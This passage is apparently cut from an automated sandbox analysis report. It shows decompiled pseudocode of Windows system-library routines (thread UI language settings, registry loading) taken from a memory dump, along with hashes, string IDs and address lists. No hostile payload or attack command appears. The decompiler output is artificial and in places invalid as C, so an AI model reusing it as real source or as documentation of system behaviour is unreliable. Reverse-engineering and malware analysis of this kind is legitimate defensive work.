                                          							break;
                                          						}
                                          						_v32 = _t336;
                                          						__eflags = _t336;
                                          						if(_t336 < 0) {
                                          							__eflags = _t336 - 0xc0000100;
                                          							if(_t336 == 0xc0000100) {
                                          								_t301 = _a4;
                                          								__eflags = _t301;
                                          								if(_t301 != 0) {
                                          									_v36 = _t301;
                                          									__eflags =  *_t301 - _t329;
                                          									if( *_t301 == _t329) {
                                          										_t336 = 0xc0000100;
                                          										goto L76;
                                          									} else {
                                          										_t317 =  *((intOrPtr*)(_v44 + 0x30));
                                          										_t258 =  *((intOrPtr*)(_t317 + 0x10));
                                          										__eflags =  *((intOrPtr*)(_t258 + 0x48)) - _t301;
                                          										if( *((intOrPtr*)(_t258 + 0x48)) == _t301) {
                                          											__eflags =  *(_t317 + 0x1c);
                                          											if( *(_t317 + 0x1c) == 0) {
                                          												L106:
                                          												_t336 = E00F42AE4( &_v36, _a8, _t292, _a16, _a20, _a24);
                                          												_v32 = _t336;
                                          												__eflags = _t336 - 0xc0000100;
                                          												if(_t336 != 0xc0000100) {
                                          													goto L69;
                                          												} else {
                                          													_t329 = 1;
                                          													_t301 = _v36;
                                          													goto L75;
                                          												}
                                          											} else {
                                          												_t261 = E00F26600( *(_t317 + 0x1c));
                                          												__eflags = _t261;
                                          												if(_t261 != 0) {
                                          													goto L106;
                                          												} else {
                                          													_t301 = _a4;
                                          													goto L75;
                                          												}
                                          											}
                                          										} else {
                                          											L75:
                                          											_t336 = E00F42C50(_t301, _a8, _t292, _a16, _a20, _a24, _t329);
                                          											L76:
                                          											_v32 = _t336;
                                          											goto L69;
                                          										}
                                          									}
                                          									goto L108;
                                          								} else {
                                          									E00F2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          									_v8 = 1;
                                          									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                          									_t336 = _a24;
                                          									_t268 = E00F42AE4( &_v36, _a8, _t292, _a16, _a20, _t336);
                                          									_v32 = _t268;
                                          									__eflags = _t268 - 0xc0000100;
                                          									if(_t268 == 0xc0000100) {
                                          										_v32 = E00F42C50(_v36, _a8, _t292, _a16, _a20, _t336, 1);
                                          									}
                                          									_v8 = _t329;
                                          									E00F42ACB();
                                          								}
                                          							}
                                          						}
                                          						L69:
                                          						_v8 = 0xfffffffe;
                                          						_t254 = _t336;
                                          					}
                                          					L70:
                                          					return E00F6D0D1(_t254);
                                          				}
                                          				L108:
                                          			}

                                          0x00f85afd
                                          0x00000000
                                          0x00f85afd
                                          0x00000000
                                          0x00000000
                                          0x00f42633
                                          0x00f42638
                                          0x00f4263b
                                          0x00f4263c
                                          0x00f4263e
                                          0x00f42640
                                          0x00f42642
                                          0x00f42647
                                          0x00f42649
                                          0x00f4264e
                                          0x00f42650
                                          0x00f42653
                                          0x00f42659
                                          0x00f426a2
                                          0x00f426a7
                                          0x00f426ac
                                          0x00f426b2
                                          0x00f85b11
                                          0x00f85b15
                                          0x00f85b17
                                          0x00000000
                                          0x00f426b8
                                          0x00f426b8
                                          0x00f426ba
                                          0x00f427a6
                                          0x00f427a6
                                          0x00f427a9
                                          0x00f427ab
                                          0x00f427b9
                                          0x00f427b9
                                          0x00f427be
                                          0x00f427c1
                                          0x00f427c3
                                          0x00f427c5
                                          0x00f427c7
                                          0x00f85c74
                                          0x00f85c79
                                          0x00f85c79
                                          0x00f427c7
                                          0x00000000
                                          0x00f426c0
                                          0x00f426c0
                                          0x00f426c3
                                          0x00f426c6
                                          0x00f426c6
                                          0x00f426c9
                                          0x00f426c9
                                          0x00000000
                                          0x00f426c9
                                          0x00f426ba
                                          0x00f4265b
                                          0x00f4265b
                                          0x00f4265e
                                          0x00f42667
                                          0x00f4266d
                                          0x00f42677
                                          0x00f4267c
                                          0x00f4267f
                                          0x00f42681
                                          0x00f85b49
                                          0x00f85b4e
                                          0x00f427cd
                                          0x00f427d0
                                          0x00f427d1
                                          0x00f427d2
                                          0x00f427d4
                                          0x00f427dd
                                          0x00f42687
                                          0x00f42687
                                          0x00f4268a
                                          0x00f4268b
                                          0x00f4268e
                                          0x00f4268f
                                          0x00f42691
                                          0x00f42696
                                          0x00f42698
                                          0x00f4269d
                                          0x00f4269f
                                          0x00000000
                                          0x00f4269f
                                          0x00f42681
                                          0x00000000
                                          0x00000000
                                          0x00f42846
                                          0x00000000
                                          0x00000000
                                          0x00f42605
                                          0x00f4260a
                                          0x00f4260c
                                          0x00f42611
                                          0x00f42616
                                          0x00f42619
                                          0x00f42619
                                          0x00f4261e
                                          0x00000000
                                          0x00f42624
                                          0x00f42627
                                          0x00f42627
                                          0x00000000
                                          0x00000000
                                          0x00f85b1f
                                          0x00000000
                                          0x00000000
                                          0x00f42894
                                          0x00f4289b
                                          0x00f4289d
                                          0x00f428a1
                                          0x00f85b2b
                                          0x00f85b2e
                                          0x00f85b2e
                                          0x00f428a7
                                          0x00f428a9
                                          0x00f85b04
                                          0x00f85b09
                                          0x00f85b09
                                          0x00f85b09
                                          0x00000000
                                          0x00000000
                                          0x00f85b35
                                          0x00f85b3c
                                          0x00f428fb
                                          0x00f428fb
                                          0x00f426cc
                                          0x00f426cc
                                          0x00f426d0
                                          0x00000000
                                          0x00f426d2
                                          0x00f426d2
                                          0x00000000
                                          0x00f426d2
                                          0x00000000
                                          0x00000000
                                          0x00f425fe
                                          0x00f4292d
                                          0x00f4292f
                                          0x00f42930
                                          0x00f42935
                                          0x00f42937
                                          0x00f42938
                                          0x00f4293b
                                          0x00f4293c
                                          0x00f4293e
                                          0x00f4293f
                                          0x00f42940
                                          0x00f42942
                                          0x00f42944
                                          0x00f42947
                                          0x00f42948
                                          0x00f4294e
                                          0x00f4294f
                                          0x00f42950
                                          0x00f42957
                                          0x00f42958
                                          0x00f4295a
                                          0x00f4295c
                                          0x00f42962
                                          0x00f42963
                                          0x00f42964
                                          0x00f42968
                                          0x00f4296b
                                          0x00f4296c
                                          0x00f4296f
                                          0x00f42972
                                          0x00f42973
                                          0x00f42974
                                          0x00f4297b
                                          0x00f4297e
                                          0x00f4297f
                                          0x00f42980
                                          0x00f42981
                                          0x00f42982
                                          0x00f42983
                                          0x00f42984
                                          0x00f42985
                                          0x00f42986
                                          0x00f42987
                                          0x00f42988
                                          0x00f42989
                                          0x00f4298a
                                          0x00f4298b
                                          0x00f4298c
                                          0x00f4298d
                                          0x00f4298e
                                          0x00f4298f
                                          0x00f42990
                                          0x00f42992
                                          0x00f42997
                                          0x00f429a3
                                          0x00f429a6
                                          0x00f429ab
                                          0x00f429ad
                                          0x00f429b0
                                          0x00f429b2
                                          0x00f85c80
                                          0x00f429b8
                                          0x00f429b8
                                          0x00f429bb
                                          0x00f429c0
                                          0x00f429c5
                                          0x00f429c6
                                          0x00f429c6
                                          0x00f429c9
                                          0x00f429cb
                                          0x00000000
                                          0x00000000
                                          0x00f429cd
                                          0x00f429d0
                                          0x00f429d9
                                          0x00f429db
                                          0x00f429dd
                                          0x00f42a7f
                                          0x00f42a84
                                          0x00f42a87
                                          0x00f42a89
                                          0x00f85ca1
                                          0x00f85ca3
                                          0x00000000
                                          0x00f42a8f
                                          0x00f42a8f
                                          0x00000000
                                          0x00f42a8f
                                          0x00000000
                                          0x00f429e3
                                          0x00f429e3
                                          0x00f429e3
                                          0x00000000
                                          0x00f429e3
                                          0x00f429dd
                                          0x00000000
                                          0x00f429db
                                          0x00f429e6
                                          0x00f429e9
                                          0x00f429eb
                                          0x00f429ed
                                          0x00f429f3
                                          0x00f429f5
                                          0x00f429f8
                                          0x00f429fa
                                          0x00f42a97
                                          0x00f42a9a
                                          0x00f42a9d
                                          0x00f42add
                                          0x00000000
                                          0x00f42a9f
                                          0x00f42aa2
                                          0x00f42aa5
                                          0x00f42aa8
                                          0x00f42aab
                                          0x00f85cab
                                          0x00f85caf
                                          0x00f85cc5
                                          0x00f85cda
                                          0x00f85cdc
                                          0x00f85cdf
                                          0x00f85ce5
                                          0x00000000
                                          0x00f85ceb
                                          0x00f85ced
                                          0x00f85cee
                                          0x00000000
                                          0x00f85cee
                                          0x00f85cb1
                                          0x00f85cb4
                                          0x00f85cb9
                                          0x00f85cbb
                                          0x00000000
                                          0x00f85cbd
                                          0x00f85cbd
                                          0x00000000
                                          0x00f85cbd
                                          0x00f85cbb
                                          0x00f42ab1
                                          0x00f42ab1
                                          0x00f42ac4
                                          0x00f42ac6
                                          0x00f42ac6
                                          0x00000000
                                          0x00f42ac6
                                          0x00f42aab
                                          0x00000000
                                          0x00f42a00
                                          0x00f42a09
                                          0x00f42a0e
                                          0x00f42a21
                                          0x00f42a24
                                          0x00f42a35
                                          0x00f42a3a
                                          0x00f42a3d
                                          0x00f42a42
                                          0x00f42a59
                                          0x00f42a59
                                          0x00f42a5c
                                          0x00f42a5f
                                          0x00f42a5f
                                          0x00f429fa
                                          0x00f429f3
                                          0x00f42a64
                                          0x00f42a64
                                          0x00f42a6b
                                          0x00f42a6b
                                          0x00f42a6d
                                          0x00f42a72
                                          0x00f42a72
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: PATH
                                          • API String ID: 0-1036084923
                                          • Opcode ID: 705441f993989bc997f683cecd7a7a57fcc2655c49e0fd97e750cad3fa7120d1
                                          • Instruction ID: 705be5c897cb97a4d6de882d421fa98a6e456b2ee952416d69b6c9286c5721b4
                                          • Opcode Fuzzy Hash: 705441f993989bc997f683cecd7a7a57fcc2655c49e0fd97e750cad3fa7120d1
                                          • Instruction Fuzzy Hash: 4FC1C172D00219DBDB65DF99D881BADBBB1FF48710F954029F941AB250DB38A805EB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 80%
                                          			E00F4FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                          				char _v5;
                                          				signed int _v8;
                                          				signed int _v12;
                                          				char _v16;
                                          				char _v17;
                                          				char _v20;
                                          				signed int _v24;
                                          				char _v28;
                                          				char _v32;
                                          				signed int _v40;
                                          				void* __ecx;
                                          				void* __edi;
                                          				void* __ebp;
                                          				signed int _t73;
                                          				intOrPtr* _t75;
                                          				signed int _t77;
                                          				signed int _t79;
                                          				signed int _t81;
                                          				intOrPtr _t83;
                                          				intOrPtr _t85;
                                          				intOrPtr _t86;
                                          				signed int _t91;
                                          				signed int _t94;
                                          				signed int _t95;
                                          				signed int _t96;
                                          				signed int _t106;
                                          				signed int _t108;
                                          				signed int _t114;
                                          				signed int _t116;
                                          				signed int _t118;
                                          				signed int _t122;
                                          				signed int _t123;
                                          				void* _t129;
                                          				signed int _t130;
                                          				void* _t132;
                                          				intOrPtr* _t134;
                                          				signed int _t138;
                                          				signed int _t141;
                                          				signed int _t147;
                                          				intOrPtr _t153;
                                          				signed int _t154;
                                          				signed int _t155;
                                          				signed int _t170;
                                          				void* _t174;
                                          				signed int _t176;
                                          				signed int _t177;
                                          
                                          				_t129 = __ebx;
                                          				_push(_t132);
                                          				_push(__esi);
                                          				_t174 = _t132;
                                          				_t73 =  !( *( *(_t174 + 0x18)));
                                          				if(_t73 >= 0) {
                                          					L5:
                                          					return _t73;
                                          				} else {
                                          					E00F2EEF0(0x1007b60);
                                          					_t134 =  *0x1007b84; // 0x77ad7b80
                                          					_t2 = _t174 + 0x24; // 0x24
                                          					_t75 = _t2;
                                          					if( *_t134 != 0x1007b80) {
                                          						_push(3);
                                          						asm("int 0x29");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						_push(0x1007b60);
                                          						_t170 = _v8;
                                          						_v28 = 0;
                                          						_v40 = 0;
                                          						_v24 = 0;
                                          						_v17 = 0;
                                          						_v32 = 0;
                                          						__eflags = _t170 & 0xffff7cf2;
                                          						if((_t170 & 0xffff7cf2) != 0) {
                                          							L43:
                                          							_t77 = 0xc000000d;
                                          						} else {
                                          							_t79 = _t170 & 0x0000000c;
                                          							__eflags = _t79;
                                          							if(_t79 != 0) {
                                          								__eflags = _t79 - 0xc;
                                          								if(_t79 == 0xc) {
                                          									goto L43;
                                          								} else {
                                          									goto L9;
                                          								}
                                          							} else {
                                          								_t170 = _t170 | 0x00000008;
                                          								__eflags = _t170;
                                          								L9:
                                          								_t81 = _t170 & 0x00000300;
                                          								__eflags = _t81 - 0x300;
                                          								if(_t81 == 0x300) {
                                          									goto L43;
                                          								} else {
                                          									_t138 = _t170 & 0x00000001;
                                          									__eflags = _t138;
                                          									_v24 = _t138;
                                          									if(_t138 != 0) {
                                          										__eflags = _t81;
                                          										if(_t81 != 0) {
                                          											goto L43;
                                          										} else {
                                          											goto L11;
                                          										}
                                          									} else {
                                          										L11:
                                          										_push(_t129);
                                          										_t77 = E00F26D90( &_v20);
                                          										_t130 = _t77;
                                          										__eflags = _t130;
                                          										if(_t130 >= 0) {
                                          											_push(_t174);
                                          											__eflags = _t170 & 0x00000301;
                                          											if((_t170 & 0x00000301) == 0) {
                                          												_t176 = _a8;
                                          												__eflags = _t176;
                                          												if(__eflags == 0) {
                                          													L64:
                                          													_t83 =  *[fs:0x18];
                                          													_t177 = 0;
                                          													__eflags =  *(_t83 + 0xfb8);
                                          													if( *(_t83 + 0xfb8) != 0) {
                                          														E00F276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                          														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                          													}
                                          													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                          													goto L15;
                                          												} else {
                                          													asm("sbb edx, edx");
                                          													_t114 = E00FB8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                          													__eflags = _t114;
                                          													if(_t114 < 0) {
                                          														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                          														E00F1B150();
                                          													}
                                          													_t116 = E00FB6D81(_t176,  &_v16);
                                          													__eflags = _t116;
                                          													if(_t116 >= 0) {
                                          														__eflags = _v16 - 2;
                                          														if(_v16 < 2) {
                                          															L56:
                                          															_t118 = E00F275CE(_v20, 5, 0);
                                          															__eflags = _t118;
                                          															if(_t118 < 0) {
                                          																L67:
                                          																_t130 = 0xc0000017;
                                          																goto L32;
                                          															} else {
                                          																__eflags = _v12;
                                          																if(_v12 == 0) {
                                          																	goto L67;
                                          																} else {
                                          																	_t153 =  *0x1008638; // 0x0
                                          																	_t122 = L00F238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                          																	_t154 = _v12;
                                          																	_t130 = _t122;
                                          																	__eflags = _t130;
                                          																	if(_t130 >= 0) {
                                          																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                          																		__eflags = _t123;
                                          																		if(_t123 != 0) {
                                          																			_t155 = _a12;
                                          																			__eflags = _t155;
                                          																			if(_t155 != 0) {
                                          																				 *_t155 = _t123;
                                          																			}
                                          																			goto L64;
                                          																		} else {
                                          																			E00F276E2(_t154);
                                          																			goto L41;
                                          																		}
                                          																	} else {
                                          																		E00F276E2(_t154);
                                          																		_t177 = 0;
                                          																		goto L18;
                                          																	}
                                          																}
                                          															}
                                          														} else {
                                          															__eflags =  *_t176;
                                          															if( *_t176 != 0) {
                                          																goto L56;
                                          															} else {
                                          																__eflags =  *(_t176 + 2);
                                          																if( *(_t176 + 2) == 0) {
                                          																	goto L64;
                                          																} else {
                                          																	goto L56;
                                          																}
                                          															}
                                          														}
                                          													} else {
                                          														_t130 = 0xc000000d;
                                          														goto L32;
                                          													}
                                          												}
                                          												goto L35;
                                          											} else {
                                          												__eflags = _a8;
                                          												if(_a8 != 0) {
                                          													_t77 = 0xc000000d;
                                          												} else {
                                          													_v5 = 1;
                                          													L00F4FCE3(_v20, _t170);
                                          													_t177 = 0;
                                          													__eflags = 0;
                                          													L15:
                                          													_t85 =  *[fs:0x18];
                                          													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                          													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                          														L18:
                                          														__eflags = _t130;
                                          														if(_t130 != 0) {
                                          															goto L32;
                                          														} else {
                                          															__eflags = _v5 - _t130;
                                          															if(_v5 == _t130) {
                                          																goto L32;
                                          															} else {
                                          																_t86 =  *[fs:0x18];
                                          																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                          																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                          																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                          																}
                                          																__eflags = _t177;
                                          																if(_t177 == 0) {
                                          																	L31:
                                          																	__eflags = 0;
                                          																	L00F270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                          																	goto L32;
                                          																} else {
                                          																	__eflags = _v24;
                                          																	_t91 =  *(_t177 + 0x20);
                                          																	if(_v24 != 0) {
                                          																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                          																		goto L31;
                                          																	} else {
                                          																		_t141 = _t91 & 0x00000040;
                                          																		__eflags = _t170 & 0x00000100;
                                          																		if((_t170 & 0x00000100) == 0) {
                                          																			__eflags = _t141;
                                          																			if(_t141 == 0) {
                                          																				L74:
                                          																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                          																				goto L27;
                                          																			} else {
                                          																				_t177 = E00F4FD22(_t177);
                                          																				__eflags = _t177;
                                          																				if(_t177 == 0) {
                                          																					goto L42;
                                          																				} else {
                                          																					_t130 = E00F4FD9B(_t177, 0, 4);
                                          																					__eflags = _t130;
                                          																					if(_t130 != 0) {
                                          																						goto L42;
                                          																					} else {
                                          																						_t68 = _t177 + 0x20;
                                          																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                          																						__eflags =  *_t68;
                                          																						_t91 =  *(_t177 + 0x20);
                                          																						goto L74;
                                          																					}
                                          																				}
                                          																			}
                                          																			goto L35;
                                          																		} else {
                                          																			__eflags = _t141;
                                          																			if(_t141 != 0) {
                                          																				_t177 = E00F4FD22(_t177);
                                          																				__eflags = _t177;
                                          																				if(_t177 == 0) {
                                          																					L42:
                                          																					_t77 = 0xc0000001;
                                          																					goto L33;
                                          																				} else {
                                          																					_t130 = E00F4FD9B(_t177, 0, 4);
                                          																					__eflags = _t130;
                                          																					if(_t130 != 0) {
                                          																						goto L42;
                                          																					} else {
                                          																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                          																						_t91 =  *(_t177 + 0x20);
                                          																						goto L26;
                                          																					}
                                          																				}
                                          																				goto L35;
                                          																			} else {
                                          																				L26:
                                          																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                          																				__eflags = _t94;
                                          																				L27:
                                          																				 *(_t177 + 0x20) = _t94;
                                          																				__eflags = _t170 & 0x00008000;
                                          																				if((_t170 & 0x00008000) != 0) {
                                          																					_t95 = _a12;
                                          																					__eflags = _t95;
                                          																					if(_t95 != 0) {
                                          																						_t96 =  *_t95;
                                          																						__eflags = _t96;
                                          																						if(_t96 != 0) {
                                          																							 *((short*)(_t177 + 0x22)) = 0;
                                          																							_t40 = _t177 + 0x20;
                                          																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                          																							__eflags =  *_t40;
                                          																						}
                                          																					}
                                          																				}
                                          																				goto L31;
                                          																			}
                                          																		}
                                          																	}
                                          																}
                                          															}
                                          														}
                                          													} else {
                                          														_t147 =  *( *[fs:0x18] + 0xfc0);
                                          														_t106 =  *(_t147 + 0x20);
                                          														__eflags = _t106 & 0x00000040;
                                          														if((_t106 & 0x00000040) != 0) {
                                          															_t147 = E00F4FD22(_t147);
                                          															__eflags = _t147;
                                          															if(_t147 == 0) {
                                          																L41:
                                          																_t130 = 0xc0000001;
                                          																L32:
                                          																_t77 = _t130;
                                          																goto L33;
                                          															} else {
                                          																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                          																_t106 =  *(_t147 + 0x20);
                                          																goto L17;
                                          															}
                                          															goto L35;
                                          														} else {
                                          															L17:
                                          															_t108 = _t106 | 0x00000080;
                                          															__eflags = _t108;
                                          															 *(_t147 + 0x20) = _t108;
                                          															 *( *[fs:0x18] + 0xfc0) = _t147;
                                          															goto L18;
                                          														}
                                          													}
                                          												}
                                          											}
                                          											L33:
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						L35:
                                          						return _t77;
                                          					} else {
                                          						 *_t75 = 0x1007b80;
                                          						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                          						 *_t134 = _t75;
                                          						 *0x1007b84 = _t75;
                                          						_t73 = E00F2EB70(_t134, 0x1007b60);
                                          						if( *0x1007b20 != 0) {
                                          							_t73 =  *( *[fs:0x30] + 0xc);
                                          							if( *((char*)(_t73 + 0x28)) == 0) {
                                          								_t73 = E00F2FF60( *0x1007b20);
                                          							}
                                          						}
                                          						goto L5;
                                          					}
                                          				}
                                          			}

                                          Strings
                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00F8BE0F
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                          • API String ID: 0-865735534
                                          • Opcode ID: 6218cccb16c4a44ed2ccb4f6115b60c91e31f0b014a314acc4fb1bccab839111
                                          • Instruction ID: 2ab7c7b27b06b0dc586f3e8fbbd4084c20ffb5c37e98aa6cf287533a899efcda
                                          • Opcode Fuzzy Hash: 6218cccb16c4a44ed2ccb4f6115b60c91e31f0b014a314acc4fb1bccab839111
                                          • Instruction Fuzzy Hash: 92A10632F0060A9FDB21DF64C890BAABBA4AF44720F144579ED4ADB681DB34DD09EB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 74%
                                          			E00F403E2(signed int __ecx, signed int __edx) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				char _v52;
                                          				char _v56;
                                          				char _v64;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t56;
                                          				signed int _t58;
                                          				char* _t64;
                                          				intOrPtr _t65;
                                          				signed int _t74;
                                          				signed int _t79;
                                          				char* _t83;
                                          				intOrPtr _t84;
                                          				signed int _t93;
                                          				signed int _t94;
                                          				signed char* _t95;
                                          				signed int _t99;
                                          				signed int _t100;
                                          				signed char* _t101;
                                          				signed int _t105;
                                          				signed int _t119;
                                          				signed int _t120;
                                          				void* _t122;
                                          				signed int _t123;
                                          				signed int _t127;
                                          
                                          				_v8 =  *0x100d360 ^ _t127;
                                          				_t119 = __ecx;
                                          				_t105 = __edx;
                                          				_t118 = 0;
                                          				_v20 = __edx;
                                          				_t120 =  *(__ecx + 0x20);
                                          				if(E00F40548(__ecx, 0) != 0) {
                                          					_t56 = 0xc000022d;
                                          					L23:
                                          					return E00F5B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                          				} else {
                                          					_v12 = _v12 | 0xffffffff;
                                          					_t58 = _t120 + 0x24;
                                          					_t109 =  *(_t120 + 0x18);
                                          					_t118 = _t58;
                                          					_v16 = _t58;
                                          					E00F2B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                          					_v52 = 0x18;
                                          					_v48 = 0;
                                          					0x840 = 0x40;
                                          					if( *0x1007c1c != 0) {
                                          					}
                                          					_v40 = 0x840;
                                          					_v44 = _t105;
                                          					_v36 = 0;
                                          					_v32 = 0;
                                          					if(E00F37D50() != 0) {
                                          						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          					} else {
                                          						_t64 = 0x7ffe0384;
                                          					}
                                          					if( *_t64 != 0) {
                                          						_t65 =  *[fs:0x30];
                                          						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                          						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                          							_t100 = E00F37D50();
                                          							__eflags = _t100;
                                          							if(_t100 == 0) {
                                          								_t101 = 0x7ffe0385;
                                          							} else {
                                          								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          							}
                                          							__eflags =  *_t101 & 0x00000020;
                                          							if(( *_t101 & 0x00000020) != 0) {
                                          								_t118 = _t118 | 0xffffffff;
                                          								_t109 = 0x1485;
                                          								E00F97016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                          							}
                                          						}
                                          					}
                                          					_t105 = 0;
                                          					while(1) {
                                          						_push(0x60);
                                          						_push(5);
                                          						_push( &_v64);
                                          						_push( &_v52);
                                          						_push(0x100021);
                                          						_push( &_v12);
                                          						_t122 = E00F59830();
                                          						if(_t122 >= 0) {
                                          							break;
                                          						}
                                          						__eflags = _t122 - 0xc0000034;
                                          						if(_t122 == 0xc0000034) {
                                          							L38:
                                          							_t120 = 0xc0000135;
                                          							break;
                                          						}
                                          						__eflags = _t122 - 0xc000003a;
                                          						if(_t122 == 0xc000003a) {
                                          							goto L38;
                                          						}
                                          						__eflags = _t122 - 0xc0000022;
                                          						if(_t122 != 0xc0000022) {
                                          							break;
                                          						}
                                          						__eflags = _t105;
                                          						if(__eflags != 0) {
                                          							break;
                                          						}
                                          						_t109 = _t119;
                                          						_t99 = E00F969A6(_t119, __eflags);
                                          						__eflags = _t99;
                                          						if(_t99 == 0) {
                                          							break;
                                          						}
                                          						_t105 = _t105 + 1;
                                          					}
                                          					if( !_t120 >= 0) {
                                          						L22:
                                          						_t56 = _t120;
                                          						goto L23;
                                          					}
                                          					if( *0x1007c04 != 0) {
                                          						_t118 = _v12;
                                          						_t120 = E00F9A7AC(_t119, _t118, _t109);
                                          						__eflags = _t120;
                                          						if(_t120 >= 0) {
                                          							goto L10;
                                          						}
                                          						__eflags =  *0x1007bd8;
                                          						if( *0x1007bd8 != 0) {
                                          							L20:
                                          							if(_v12 != 0xffffffff) {
                                          								_push(_v12);
                                          								E00F595D0();
                                          							}
                                          							goto L22;
                                          						}
                                          					}
                                          					L10:
                                          					_push(_v12);
                                          					_t105 = _t119 + 0xc;
                                          					_push("RegLoadRegistryInfo");
                                          					_push(0x10);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0xf);
                                          					_push(_t105);
                                          					_t120 = E00F599A0();
                                          					if(_t120 < 0) {
                                          						__eflags = _t120 - 0xc000047e;
                                          						if(_t120 == 0xc000047e) {
                                          							L51:
                                          							_t74 = E00F93540(_t120);
                                          							_t119 = _v16;
                                          							_t120 = _t74;
                                          							L52:
                                          							_t118 = 0x1485;
                                          							E00F1B1E1(_t120, 0x1485, 0, _t119);
                                          							goto L20;
                                          						}
                                          						__eflags = _t120 - 0xc000047f;
                                          						if(_t120 == 0xc000047f) {
                                          							goto L51;
                                          						}
                                          						__eflags = _t120 - 0xc0000462;
                                          						if(_t120 == 0xc0000462) {
                                          							goto L51;
                                          						}
                                          						_t119 = _v16;
                                          						__eflags = _t120 - 0xc0000017;
                                          						if(_t120 != 0xc0000017) {
                                          							__eflags = _t120 - 0xc000009a;
                                          							if(_t120 != 0xc000009a) {
                                          								__eflags = _t120 - 0xc000012d;
                                          								if(_t120 != 0xc000012d) {
                                          									_v28 = _t119;
                                          									_push( &_v56);
                                          									_push(1);
                                          									_v24 = _t120;
                                          									_push( &_v28);
                                          									_push(1);
                                          									_push(2);
                                          									_push(0xc000007b);
                                          									_t79 = E00F5AAF0();
                                          									__eflags = _t79;
                                          									if(_t79 >= 0) {
                                          										__eflags =  *0x1008474 - 3;
                                          										if( *0x1008474 != 3) {
                                          											 *0x10079dc =  *0x10079dc + 1;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						goto L52;
                                          					}
                                          					if(E00F37D50() != 0) {
                                          						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          					} else {
                                          						_t83 = 0x7ffe0384;
                                          					}
                                          					if( *_t83 != 0) {
                                          						_t84 =  *[fs:0x30];
                                          						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                          						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                          							_t94 = E00F37D50();
                                          							__eflags = _t94;
                                          							if(_t94 == 0) {
                                          								_t95 = 0x7ffe0385;
                                          							} else {
                                          								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          							}
                                          							__eflags =  *_t95 & 0x00000020;
                                          							if(( *_t95 & 0x00000020) != 0) {
                                          								E00F97016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                          							}
                                          						}
                                          					}
                                          					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                          						if( *0x1008708 != 0) {
                                          							_t118 =  *0x7ffe0330;
                                          							_t123 =  *0x1007b00; // 0x0
                                          							asm("ror esi, cl");
                                          							 *0x100b1e0(_v12, _v20, 0x20);
                                          							_t93 =  *(_t123 ^  *0x7ffe0330)();
